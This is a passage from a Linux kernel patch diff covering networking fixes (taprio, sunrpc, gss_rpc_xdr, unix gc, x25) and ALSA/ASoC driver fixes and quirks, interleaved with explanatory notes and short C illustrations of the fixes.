+ 	 * hot path and finding waiters is very rare.  We don't want to walk
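The rds change above swaps an open-coded atomic flag for the
test_and_set_bit_lock()/clear_bit_unlock() pair, which carry acquire and
release semantics and make the explicit smp_mb__after_atomic()
unnecessary. A userspace analogue of the pairing using C11 atomics (a
sketch of the ordering contract only, not the kernel implementation):

#include <stdatomic.h>
#include <stdbool.h>

static atomic_ulong cp_flags;
#define RDS_IN_XMIT 0

/* Acquire: accesses in the critical section cannot move before this. */
static bool acquire_in_xmit(void)
{
	unsigned long old = atomic_fetch_or_explicit(&cp_flags,
						     1UL << RDS_IN_XMIT,
						     memory_order_acquire);
	return !(old & (1UL << RDS_IN_XMIT));
}

/* Release: accesses in the critical section cannot move after this. */
static void release_in_xmit(void)
{
	atomic_fetch_and_explicit(&cp_flags, ~(1UL << RDS_IN_XMIT),
				  memory_order_release);
}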
+diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
+index 8d5eebb2dd1b1..1d4638aa4254f 100644
+--- a/net/sched/sch_taprio.c
++++ b/net/sched/sch_taprio.c
+@@ -765,7 +765,8 @@ static const struct nla_policy entry_policy[TCA_TAPRIO_SCHED_ENTRY_MAX + 1] = {
+ };
+ 
+ static const struct nla_policy taprio_tc_policy[TCA_TAPRIO_TC_ENTRY_MAX + 1] = {
+-	[TCA_TAPRIO_TC_ENTRY_INDEX]	   = { .type = NLA_U32 },
++	[TCA_TAPRIO_TC_ENTRY_INDEX]	   = NLA_POLICY_MAX(NLA_U32,
++							    TC_QOPT_MAX_QUEUE),
+ 	[TCA_TAPRIO_TC_ENTRY_MAX_SDU]	   = { .type = NLA_U32 },
+ };
+ 
+diff --git a/net/sunrpc/addr.c b/net/sunrpc/addr.c
+index d435bffc61999..97ff11973c493 100644
+--- a/net/sunrpc/addr.c
++++ b/net/sunrpc/addr.c
+@@ -284,10 +284,10 @@ char *rpc_sockaddr2uaddr(const struct sockaddr *sap, gfp_t gfp_flags)
+ 	}
+ 
+ 	if (snprintf(portbuf, sizeof(portbuf),
+-		     ".%u.%u", port >> 8, port & 0xff) > (int)sizeof(portbuf))
++		     ".%u.%u", port >> 8, port & 0xff) >= (int)sizeof(portbuf))
+ 		return NULL;
+ 
+-	if (strlcat(addrbuf, portbuf, sizeof(addrbuf)) > sizeof(addrbuf))
++	if (strlcat(addrbuf, portbuf, sizeof(addrbuf)) >= sizeof(addrbuf))
+ 		return NULL;
+ 
+ 	return kstrdup(addrbuf, gfp_flags);
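Both comparisons above move from '>' to '>=' because snprintf() returns
the length the output would have had, and strlcat() returns the total
length it tried to create; a return value equal to the buffer size
already means the string was truncated (one byte is reserved for the
NUL). A standalone illustration:

#include <stdio.h>

int main(void)
{
	char buf[8];

	/* Eight characters need nine bytes; only seven fit. The return
	 * value is 8 == sizeof(buf), which '>' would wrongly accept. */
	int n = snprintf(buf, sizeof(buf), "%s", "12345678");
	if (n >= (int)sizeof(buf))
		printf("truncated: \"%s\" (needed %d bytes + NUL)\n",
		       buf, n);
	return 0;
}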
+diff --git a/net/sunrpc/auth_gss/gss_rpc_xdr.c b/net/sunrpc/auth_gss/gss_rpc_xdr.c
+index d79f12c2550ac..cb32ab9a83952 100644
+--- a/net/sunrpc/auth_gss/gss_rpc_xdr.c
++++ b/net/sunrpc/auth_gss/gss_rpc_xdr.c
+@@ -250,8 +250,8 @@ static int gssx_dec_option_array(struct xdr_stream *xdr,
+ 
+ 	creds = kzalloc(sizeof(struct svc_cred), GFP_KERNEL);
+ 	if (!creds) {
+-		kfree(oa->data);
+-		return -ENOMEM;
++		err = -ENOMEM;
++		goto free_oa;
+ 	}
+ 
+ 	oa->data[0].option.data = CREDS_VALUE;
+@@ -265,29 +265,40 @@ static int gssx_dec_option_array(struct xdr_stream *xdr,
+ 
+ 		/* option buffer */
+ 		p = xdr_inline_decode(xdr, 4);
+-		if (unlikely(p == NULL))
+-			return -ENOSPC;
++		if (unlikely(p == NULL)) {
++			err = -ENOSPC;
++			goto free_creds;
++		}
+ 
+ 		length = be32_to_cpup(p);
+ 		p = xdr_inline_decode(xdr, length);
+-		if (unlikely(p == NULL))
+-			return -ENOSPC;
++		if (unlikely(p == NULL)) {
++			err = -ENOSPC;
++			goto free_creds;
++		}
+ 
+ 		if (length == sizeof(CREDS_VALUE) &&
+ 		    memcmp(p, CREDS_VALUE, sizeof(CREDS_VALUE)) == 0) {
+ 			/* We have creds here. parse them */
+ 			err = gssx_dec_linux_creds(xdr, creds);
+ 			if (err)
+-				return err;
++				goto free_creds;
+ 			oa->data[0].value.len = 1; /* presence */
+ 		} else {
+ 			/* consume uninteresting buffer */
+ 			err = gssx_dec_buffer(xdr, &dummy);
+ 			if (err)
+-				return err;
++				goto free_creds;
+ 		}
+ 	}
+ 	return 0;
++
++free_creds:
++	kfree(creds);
++free_oa:
++	kfree(oa->data);
++	oa->data = NULL;
++	return err;
+ }
+ 
+ static int gssx_dec_status(struct xdr_stream *xdr,
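The gss_rpc_xdr hunk above converts early returns that leaked 'creds'
and 'oa->data' into the kernel's usual goto-unwind ladder: one label per
live resource, released in reverse order of acquisition, with the
success path returning before the labels. A minimal standalone sketch of
the shape (parse_step() is a hypothetical stand-in for a decode step):

#include <stdlib.h>

static int parse_step(void) { return -1; } /* hypothetical failure */

int decode_options(char **out)
{
	int err;
	char *data = malloc(64);
	if (!data)
		return -1;

	char *creds = malloc(64);
	if (!creds) {
		err = -1;
		goto free_data;        /* only 'data' is live here   */
	}

	err = parse_step();
	if (err)
		goto free_creds;       /* both allocations are live  */

	*out = data;                   /* success keeps 'data' alive */
	free(creds);
	return 0;

free_creds:
	free(creds);
free_data:
	free(data);
	*out = NULL;
	return err;
}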
+diff --git a/net/unix/garbage.c b/net/unix/garbage.c
+index ab2c83d58b62a..9bfffe2a7f020 100644
+--- a/net/unix/garbage.c
++++ b/net/unix/garbage.c
+@@ -198,7 +198,7 @@ void wait_for_unix_gc(void)
+ 	if (READ_ONCE(unix_tot_inflight) > UNIX_INFLIGHT_TRIGGER_GC &&
+ 	    !READ_ONCE(gc_in_progress))
+ 		unix_gc();
+-	wait_event(unix_gc_wait, gc_in_progress == false);
++	wait_event(unix_gc_wait, !READ_ONCE(gc_in_progress));
+ }
+ 
+ /* The external entry point: unix_gc() */
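The wait_event() condition above now uses READ_ONCE() so that each
re-evaluation performs a real, untorn load of gc_in_progress instead of
a plain read the compiler may fuse or hoist, matching the READ_ONCE()
already used on the same flags a few lines up. A userspace analogue with
C11 relaxed atomics, which give the same one-load-per-iteration
guarantee:

#include <stdatomic.h>
#include <stdbool.h>

static atomic_bool gc_in_progress;

static void wait_for_gc(void)
{
	/* Every iteration issues a fresh load; a plain bool read could
	 * legally be cached in a register and spin forever. */
	while (atomic_load_explicit(&gc_in_progress, memory_order_relaxed))
		; /* the kernel sleeps in wait_event() instead */
}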
+diff --git a/net/unix/scm.c b/net/unix/scm.c
+index e8e2a00bb0f58..d1048b4c2baaf 100644
+--- a/net/unix/scm.c
++++ b/net/unix/scm.c
+@@ -34,10 +34,8 @@ struct sock *unix_get_socket(struct file *filp)
+ 		/* PF_UNIX ? */
+ 		if (s && sock->ops && sock->ops->family == PF_UNIX)
+ 			u_sock = s;
+-	} else {
+-		/* Could be an io_uring instance */
+-		u_sock = io_uring_get_socket(filp);
+ 	}
++
+ 	return u_sock;
+ }
+ EXPORT_SYMBOL(unix_get_socket);
+diff --git a/net/x25/af_x25.c b/net/x25/af_x25.c
+index 5c7ad301d742e..5a8b2ea56564e 100644
+--- a/net/x25/af_x25.c
++++ b/net/x25/af_x25.c
+@@ -460,12 +460,12 @@ static int x25_getsockopt(struct socket *sock, int level, int optname,
+ 	if (get_user(len, optlen))
+ 		goto out;
+ 
+-	len = min_t(unsigned int, len, sizeof(int));
+-
+ 	rc = -EINVAL;
+ 	if (len < 0)
+ 		goto out;
+ 
++	len = min_t(unsigned int, len, sizeof(int));
++
+ 	rc = -EFAULT;
+ 	if (put_user(len, optlen))
+ 		goto out;
+diff --git a/scripts/clang-tools/gen_compile_commands.py b/scripts/clang-tools/gen_compile_commands.py
+index d800b2c0af977..4f414ab706bd8 100755
+--- a/scripts/clang-tools/gen_compile_commands.py
++++ b/scripts/clang-tools/gen_compile_commands.py
+@@ -170,7 +170,7 @@ def process_line(root_directory, command_prefix, file_path):
+     # escape the pound sign '#', either as '\#' or '$(pound)' (depending on the
+     # kernel version). The compile_commands.json file is not interpreted
+     # by Make, so this code replaces the escaped version with '#'.
+-    prefix = command_prefix.replace('\#', '#').replace('$(pound)', '#')
++    prefix = command_prefix.replace(r'\#', '#').replace('$(pound)', '#')
+ 
+     # Use os.path.abspath() to normalize the path resolving '.' and '..' .
+     abs_path = os.path.abspath(os.path.join(root_directory, file_path))
+diff --git a/scripts/kconfig/lexer.l b/scripts/kconfig/lexer.l
+index cc386e4436834..2c2b3e6f248ca 100644
+--- a/scripts/kconfig/lexer.l
++++ b/scripts/kconfig/lexer.l
+@@ -302,8 +302,11 @@ static char *expand_token(const char *in, size_t n)
+ 	new_string();
+ 	append_string(in, n);
+ 
+-	/* get the whole line because we do not know the end of token. */
+-	while ((c = input()) != EOF) {
++	/*
++	 * get the whole line because we do not know the end of token.
++	 * input() returns 0 (not EOF!) when it reaches the end of file.
++	 */
++	while ((c = input()) != 0) {
+ 		if (c == '\n') {
+ 			unput(c);
+ 			break;
+diff --git a/sound/core/seq/seq_midi.c b/sound/core/seq/seq_midi.c
+index 4589aac091542..b00bbf18a6f5d 100644
+--- a/sound/core/seq/seq_midi.c
++++ b/sound/core/seq/seq_midi.c
+@@ -112,6 +112,12 @@ static int dump_midi(struct snd_rawmidi_substream *substream, const char *buf, i
+ 	return 0;
+ }
+ 
++/* callback for snd_seq_dump_var_event(), bridging to dump_midi() */
++static int __dump_midi(void *ptr, void *buf, int count)
++{
++	return dump_midi(ptr, buf, count);
++}
++
+ static int event_process_midi(struct snd_seq_event *ev, int direct,
+ 			      void *private_data, int atomic, int hop)
+ {
+@@ -131,7 +137,7 @@ static int event_process_midi(struct snd_seq_event *ev, int direct,
+ 			pr_debug("ALSA: seq_midi: invalid sysex event flags = 0x%x\n", ev->flags);
+ 			return 0;
+ 		}
+-		snd_seq_dump_var_event(ev, (snd_seq_dump_func_t)dump_midi, substream);
++		snd_seq_dump_var_event(ev, __dump_midi, substream);
+ 		snd_midi_event_reset_decode(msynth->parser);
+ 	} else {
+ 		if (msynth->parser == NULL)
+diff --git a/sound/core/seq/seq_virmidi.c b/sound/core/seq/seq_virmidi.c
+index f5cae49500c81..ffd8e7202c334 100644
+--- a/sound/core/seq/seq_virmidi.c
++++ b/sound/core/seq/seq_virmidi.c
+@@ -62,6 +62,13 @@ static void snd_virmidi_init_event(struct snd_virmidi *vmidi,
+ /*
+  * decode input event and put to read buffer of each opened file
+  */
++
++/* callback for snd_seq_dump_var_event(), bridging to snd_rawmidi_receive() */
++static int dump_to_rawmidi(void *ptr, void *buf, int count)
++{
++	return snd_rawmidi_receive(ptr, buf, count);
++}
++
+ static int snd_virmidi_dev_receive_event(struct snd_virmidi_dev *rdev,
+ 					 struct snd_seq_event *ev,
+ 					 bool atomic)
+@@ -80,7 +87,7 @@ static int snd_virmidi_dev_receive_event(struct snd_virmidi_dev *rdev,
+ 		if (ev->type == SNDRV_SEQ_EVENT_SYSEX) {
+ 			if ((ev->flags & SNDRV_SEQ_EVENT_LENGTH_MASK) != SNDRV_SEQ_EVENT_LENGTH_VARIABLE)
+ 				continue;
+-			snd_seq_dump_var_event(ev, (snd_seq_dump_func_t)snd_rawmidi_receive, vmidi->substream);
++			snd_seq_dump_var_event(ev, dump_to_rawmidi, vmidi->substream);
+ 			snd_midi_event_reset_decode(vmidi->parser);
+ 		} else {
+ 			len = snd_midi_event_decode(vmidi->parser, msg, sizeof(msg), ev);
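Both ALSA sequencer hunks above replace a call through a cast function
pointer, (snd_seq_dump_func_t)dump_midi, with a tiny bridge whose
prototype matches the callback type exactly. An indirect call through a
mismatched pointer type is undefined behavior and trips
control-flow-integrity (CFI) checking where it is enabled. A standalone
sketch of the bridge pattern (types illustrative):

#include <stdio.h>

typedef int (*dump_func_t)(void *ptr, void *buf, int count);

/* The worker has a more specific first parameter... */
static int dump_midi(FILE *stream, const char *buf, int count)
{
	return (int)fwrite(buf, 1, (size_t)count, stream);
}

/* ...so a thin wrapper with the exact callback signature forwards to
 * it, instead of casting &dump_midi to dump_func_t. */
static int __dump_midi(void *ptr, void *buf, int count)
{
	return dump_midi(ptr, buf, count);
}

static int dispatch(dump_func_t fn, void *ctx, void *buf, int count)
{
	return fn(ctx, buf, count); /* indirect call, types now match */
}

int main(void)
{
	char msg[] = "note-on";
	return dispatch(__dump_midi, stdout, msg, sizeof(msg) - 1) < 0;
}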
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 75bd7b2fa4ee6..6e759032eba2e 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -3681,6 +3681,7 @@ static void alc285_hp_init(struct hda_codec *codec)
+ 	int i, val;
+ 	int coef38, coef0d, coef36;
+ 
++	alc_write_coefex_idx(codec, 0x58, 0x00, 0x1888); /* write default value */
+ 	alc_update_coef_idx(codec, 0x4a, 1<<15, 1<<15); /* Reset HP JD */
+ 	coef38 = alc_read_coef_idx(codec, 0x38); /* Amp control */
+ 	coef0d = alc_read_coef_idx(codec, 0x0d); /* Digital Misc control */
+@@ -6692,6 +6693,60 @@ static void alc285_fixup_hp_spectre_x360(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc285_fixup_hp_envy_x360(struct hda_codec *codec,
++				      const struct hda_fixup *fix,
++				      int action)
++{
++	static const struct coef_fw coefs[] = {
++		WRITE_COEF(0x08, 0x6a0c), WRITE_COEF(0x0d, 0xa023),
++		WRITE_COEF(0x10, 0x0320), WRITE_COEF(0x1a, 0x8c03),
++		WRITE_COEF(0x25, 0x1800), WRITE_COEF(0x26, 0x003a),
++		WRITE_COEF(0x28, 0x1dfe), WRITE_COEF(0x29, 0xb014),
++		WRITE_COEF(0x2b, 0x1dfe), WRITE_COEF(0x37, 0xfe15),
++		WRITE_COEF(0x38, 0x7909), WRITE_COEF(0x45, 0xd489),
++		WRITE_COEF(0x46, 0x00f4), WRITE_COEF(0x4a, 0x21e0),
++		WRITE_COEF(0x66, 0x03f0), WRITE_COEF(0x67, 0x1000),
++		WRITE_COEF(0x6e, 0x1005), { }
++	};
++
++	static const struct hda_pintbl pincfgs[] = {
++		{ 0x12, 0xb7a60130 },  /* Internal microphone */
++		{ 0x14, 0x90170150 },  /* B&O soundbar speakers */
++		{ 0x17, 0x90170153 },  /* Side speakers */
++		{ 0x19, 0x03a11040 },  /* Headset microphone */
++		{ }
++	};
++
++	switch (action) {
++	case HDA_FIXUP_ACT_PRE_PROBE:
++		snd_hda_apply_pincfgs(codec, pincfgs);
++
++		/* Fixes volume control problem for side speakers */
++		alc295_fixup_disable_dac3(codec, fix, action);
++
++		/* Fixes no sound from headset speaker */
++		snd_hda_codec_amp_stereo(codec, 0x21, HDA_OUTPUT, 0, -1, 0);
++
++		/* Auto-enable headset mic when plugged */
++		snd_hda_jack_set_gating_jack(codec, 0x19, 0x21);
++
++		/* Headset mic volume enhancement */
++		snd_hda_codec_set_pin_target(codec, 0x19, PIN_VREF50);
++		break;
++	case HDA_FIXUP_ACT_INIT:
++		alc_process_coef_fw(codec, coefs);
++		break;
++	case HDA_FIXUP_ACT_BUILD:
++		rename_ctl(codec, "Bass Speaker Playback Volume",
++			   "B&O-Tuned Playback Volume");
++		rename_ctl(codec, "Front Playback Switch",
++			   "B&O Soundbar Playback Switch");
++		rename_ctl(codec, "Bass Speaker Playback Switch",
++			   "Side Speaker Playback Switch");
++		break;
++	}
++}
++
+ /* for hda_fixup_thinkpad_acpi() */
+ #include "thinkpad_helper.c"
+ 
+@@ -7130,6 +7185,7 @@ enum {
+ 	ALC280_FIXUP_HP_9480M,
+ 	ALC245_FIXUP_HP_X360_AMP,
+ 	ALC285_FIXUP_HP_SPECTRE_X360_EB1,
++	ALC285_FIXUP_HP_ENVY_X360,
+ 	ALC288_FIXUP_DELL_HEADSET_MODE,
+ 	ALC288_FIXUP_DELL1_MIC_NO_PRESENCE,
+ 	ALC288_FIXUP_DELL_XPS_13,
+@@ -9053,6 +9109,12 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_hp_spectre_x360_eb1
+ 	},
++	[ALC285_FIXUP_HP_ENVY_X360] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc285_fixup_hp_envy_x360,
++		.chained = true,
++		.chain_id = ALC285_FIXUP_HP_GPIO_AMP_INIT,
++	},
+ 	[ALC287_FIXUP_IDEAPAD_BASS_SPK_AMP] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_ideapad_s740_coef,
+@@ -9594,6 +9656,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x84e7, "HP Pavilion 15", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x8519, "HP Spectre x360 15-df0xxx", ALC285_FIXUP_HP_SPECTRE_X360),
+ 	SND_PCI_QUIRK(0x103c, 0x8537, "HP ProBook 440 G6", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x85de, "HP Envy x360 13-ar0xxx", ALC285_FIXUP_HP_ENVY_X360),
+ 	SND_PCI_QUIRK(0x103c, 0x860f, "HP ZBook 15 G6", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x861f, "HP Elite Dragonfly G1", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x869d, "HP", ALC236_FIXUP_HP_MUTE_LED),
+@@ -10248,6 +10311,7 @@ static const struct hda_model_fixup alc269_fixup_models[] = {
+ 	{.id = ALC295_FIXUP_HP_OMEN, .name = "alc295-hp-omen"},
+ 	{.id = ALC285_FIXUP_HP_SPECTRE_X360, .name = "alc285-hp-spectre-x360"},
+ 	{.id = ALC285_FIXUP_HP_SPECTRE_X360_EB1, .name = "alc285-hp-spectre-x360-eb1"},
++	{.id = ALC285_FIXUP_HP_ENVY_X360, .name = "alc285-hp-envy-x360"},
+ 	{.id = ALC287_FIXUP_IDEAPAD_BASS_SPK_AMP, .name = "alc287-ideapad-bass-spk-amp"},
+ 	{.id = ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN, .name = "alc287-yoga9-bass-spk-pin"},
+ 	{.id = ALC623_FIXUP_LENOVO_THINKSTATION_P340, .name = "alc623-lenovo-thinkstation-p340"},
+diff --git a/sound/soc/amd/acp/acp-sof-mach.c b/sound/soc/amd/acp/acp-sof-mach.c
+index f19f064a75272..972600d271586 100644
+--- a/sound/soc/amd/acp/acp-sof-mach.c
++++ b/sound/soc/amd/acp/acp-sof-mach.c
+@@ -114,16 +114,14 @@ static int acp_sof_probe(struct platform_device *pdev)
+ 	card->num_controls = ARRAY_SIZE(acp_controls);
+ 	card->drvdata = (struct acp_card_drvdata *)pdev->id_entry->driver_data;
+ 
+-	acp_sofdsp_dai_links_create(card);
++	ret = acp_sofdsp_dai_links_create(card);
++	if (ret)
++		return dev_err_probe(&pdev->dev, ret, "Failed to create DAI links\n");
+ 
+ 	ret = devm_snd_soc_register_card(&pdev->dev, card);
+-	if (ret) {
+-		dev_err(&pdev->dev,
+-				"devm_snd_soc_register_card(%s) failed: %d\n",
+-				card->name, ret);
+-		return ret;
+-	}
+-
++	if (ret)
++		return dev_err_probe(&pdev->dev, ret,
++				     "Failed to register card(%s)\n", card->name);
+ 	return 0;
+ }
+ 
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 28da4e1858d7e..e0f406b6646ba 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -199,6 +199,20 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21HY"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21J2"),
++		}
++	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21J0"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -227,6 +241,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "82QF"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82UU"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index 844d14d4c9a51..aac9140749968 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -3802,6 +3802,16 @@ static const struct dmi_system_id dmi_platform_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_BOARD_VENDOR, "AMI Corporation"),
+ 		  DMI_EXACT_MATCH(DMI_BOARD_NAME, "Cherry Trail CR"),
+ 		  DMI_EXACT_MATCH(DMI_BOARD_VERSION, "Default string"),
++		  /*
++		   * Above strings are too generic, LattePanda BIOS versions for
++		   * all 4 hw revisions are:
++		   * DF-BI-7-S70CR100-*
++		   * DF-BI-7-S70CR110-*
++		   * DF-BI-7-S70CR200-*
++		   * LP-BS-7-S70CR700-*
++		   * Do a partial match for S70CR to avoid false positive matches.
++		   */
++		  DMI_MATCH(DMI_BIOS_VERSION, "S70CR"),
+ 		},
+ 		.driver_data = (void *)&lattepanda_board_platform_data,
+ 	},
+diff --git a/sound/soc/codecs/wm8962.c b/sound/soc/codecs/wm8962.c
+index b901e4c65e8a5..d215e58c4a7b3 100644
+--- a/sound/soc/codecs/wm8962.c
++++ b/sound/soc/codecs/wm8962.c
+@@ -2229,6 +2229,9 @@ SND_SOC_DAPM_PGA_E("HPOUT", SND_SOC_NOPM, 0, 0, NULL, 0, hp_event,
+ 
+ SND_SOC_DAPM_OUTPUT("HPOUTL"),
+ SND_SOC_DAPM_OUTPUT("HPOUTR"),
++
++SND_SOC_DAPM_PGA("SPKOUTL Output", WM8962_CLASS_D_CONTROL_1, 6, 0, NULL, 0),
++SND_SOC_DAPM_PGA("SPKOUTR Output", WM8962_CLASS_D_CONTROL_1, 7, 0, NULL, 0),
+ };
+ 
+ static const struct snd_soc_dapm_widget wm8962_dapm_spk_mono_widgets[] = {
+@@ -2236,7 +2239,6 @@ SND_SOC_DAPM_MIXER("Speaker Mixer", WM8962_MIXER_ENABLES, 1, 0,
+ 		   spkmixl, ARRAY_SIZE(spkmixl)),
+ SND_SOC_DAPM_MUX_E("Speaker PGA", WM8962_PWR_MGMT_2, 4, 0, &spkoutl_mux,
+ 		   out_pga_event, SND_SOC_DAPM_POST_PMU),
+-SND_SOC_DAPM_PGA("Speaker Output", WM8962_CLASS_D_CONTROL_1, 7, 0, NULL, 0),
+ SND_SOC_DAPM_OUTPUT("SPKOUT"),
+ };
+ 
+@@ -2251,9 +2253,6 @@ SND_SOC_DAPM_MUX_E("SPKOUTL PGA", WM8962_PWR_MGMT_2, 4, 0, &spkoutl_mux,
+ SND_SOC_DAPM_MUX_E("SPKOUTR PGA", WM8962_PWR_MGMT_2, 3, 0, &spkoutr_mux,
+ 		   out_pga_event, SND_SOC_DAPM_POST_PMU),
+ 
+-SND_SOC_DAPM_PGA("SPKOUTR Output", WM8962_CLASS_D_CONTROL_1, 7, 0, NULL, 0),
+-SND_SOC_DAPM_PGA("SPKOUTL Output", WM8962_CLASS_D_CONTROL_1, 6, 0, NULL, 0),
+-
+ SND_SOC_DAPM_OUTPUT("SPKOUTL"),
+ SND_SOC_DAPM_OUTPUT("SPKOUTR"),
+ };
+@@ -2366,12 +2365,18 @@ static const struct snd_soc_dapm_route wm8962_spk_mono_intercon[] = {
+ 	{ "Speaker PGA", "Mixer", "Speaker Mixer" },
+ 	{ "Speaker PGA", "DAC", "DACL" },
+ 
+-	{ "Speaker Output", NULL, "Speaker PGA" },
+-	{ "Speaker Output", NULL, "SYSCLK" },
+-	{ "Speaker Output", NULL, "TOCLK" },
+-	{ "Speaker Output", NULL, "TEMP_SPK" },
++	{ "SPKOUTL Output", NULL, "Speaker PGA" },
++	{ "SPKOUTL Output", NULL, "SYSCLK" },
++	{ "SPKOUTL Output", NULL, "TOCLK" },
++	{ "SPKOUTL Output", NULL, "TEMP_SPK" },
+ 
+-	{ "SPKOUT", NULL, "Speaker Output" },
++	{ "SPKOUTR Output", NULL, "Speaker PGA" },
++	{ "SPKOUTR Output", NULL, "SYSCLK" },
++	{ "SPKOUTR Output", NULL, "TOCLK" },
++	{ "SPKOUTR Output", NULL, "TEMP_SPK" },
++
++	{ "SPKOUT", NULL, "SPKOUTL Output" },
++	{ "SPKOUT", NULL, "SPKOUTR Output" },
+ };
+ 
+ static const struct snd_soc_dapm_route wm8962_spk_stereo_intercon[] = {
+@@ -2914,8 +2919,12 @@ static int wm8962_set_fll(struct snd_soc_component *component, int fll_id, int s
+ 	switch (fll_id) {
+ 	case WM8962_FLL_MCLK:
+ 	case WM8962_FLL_BCLK:
++		fll1 |= (fll_id - 1) << WM8962_FLL_REFCLK_SRC_SHIFT;
++		break;
+ 	case WM8962_FLL_OSC:
+ 		fll1 |= (fll_id - 1) << WM8962_FLL_REFCLK_SRC_SHIFT;
++		snd_soc_component_update_bits(component, WM8962_PLL2,
++					      WM8962_OSC_ENA, WM8962_OSC_ENA);
+ 		break;
+ 	case WM8962_FLL_INT:
+ 		snd_soc_component_update_bits(component, WM8962_FLL_CONTROL_1,
+@@ -2924,7 +2933,7 @@ static int wm8962_set_fll(struct snd_soc_component *component, int fll_id, int s
+ 				    WM8962_FLL_FRC_NCO, WM8962_FLL_FRC_NCO);
+ 		break;
+ 	default:
+-		dev_err(component->dev, "Unknown FLL source %d\n", ret);
++		dev_err(component->dev, "Unknown FLL source %d\n", source);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index 797d0a48d6066..094445036c20f 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -685,6 +685,18 @@ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
+ 					BYT_RT5640_SSP0_AIF1 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
++	{	/* Chuwi Vi8 dual-boot (CWI506) */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "i86"),
++			/* The above are too generic, also match BIOS info */
++			DMI_MATCH(DMI_BIOS_VERSION, "CHUWI2.D86JHBNR02"),
++		},
++		.driver_data = (void *)(BYTCR_INPUT_DEFAULTS |
++					BYT_RT5640_MONO_SPEAKER |
++					BYT_RT5640_SSP0_AIF1 |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{
+ 		/* Chuwi Vi10 (CWI505) */
+ 		.matches = {
+diff --git a/sound/soc/meson/aiu.c b/sound/soc/meson/aiu.c
+index 88e611e64d14f..077b9c0b6c4ca 100644
+--- a/sound/soc/meson/aiu.c
++++ b/sound/soc/meson/aiu.c
+@@ -218,11 +218,12 @@ static const char * const aiu_spdif_ids[] = {
+ static int aiu_clk_get(struct device *dev)
+ {
+ 	struct aiu *aiu = dev_get_drvdata(dev);
++	struct clk *pclk;
+ 	int ret;
+ 
+-	aiu->pclk = devm_clk_get(dev, "pclk");
+-	if (IS_ERR(aiu->pclk))
+-		return dev_err_probe(dev, PTR_ERR(aiu->pclk), "Can't get the aiu pclk\n");
++	pclk = devm_clk_get_enabled(dev, "pclk");
++	if (IS_ERR(pclk))
++		return dev_err_probe(dev, PTR_ERR(pclk), "Can't get the aiu pclk\n");
+ 
+ 	aiu->spdif_mclk = devm_clk_get(dev, "spdif_mclk");
+ 	if (IS_ERR(aiu->spdif_mclk))
+@@ -239,18 +240,6 @@ static int aiu_clk_get(struct device *dev)
+ 	if (ret)
+ 		return dev_err_probe(dev, ret, "Can't get the spdif clocks\n");
+ 
+-	ret = clk_prepare_enable(aiu->pclk);
+-	if (ret) {
+-		dev_err(dev, "peripheral clock enable failed\n");
+-		return ret;
+-	}
+-
+-	ret = devm_add_action_or_reset(dev,
+-				       (void(*)(void *))clk_disable_unprepare,
+-				       aiu->pclk);
+-	if (ret)
+-		dev_err(dev, "failed to add reset action on pclk");
+-
+ 	return ret;
+ }
+ 
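This hunk and the t9015.c one below share a pattern:
devm_clk_get_enabled() replaces the devm_clk_get() +
clk_prepare_enable() + devm_add_action_or_reset() triple, acquiring the
clock, enabling it and scheduling the disable/put for device teardown in
one call; the clk pointer no longer needs to live in the driver struct.
A hedged probe-time sketch of the idiom (kernel code; device and clock
name illustrative):

#include <linux/clk.h>
#include <linux/device.h>
#include <linux/err.h>

static int example_probe_clk(struct device *dev)
{
	/* Enabled for the lifetime of the binding; disabled and
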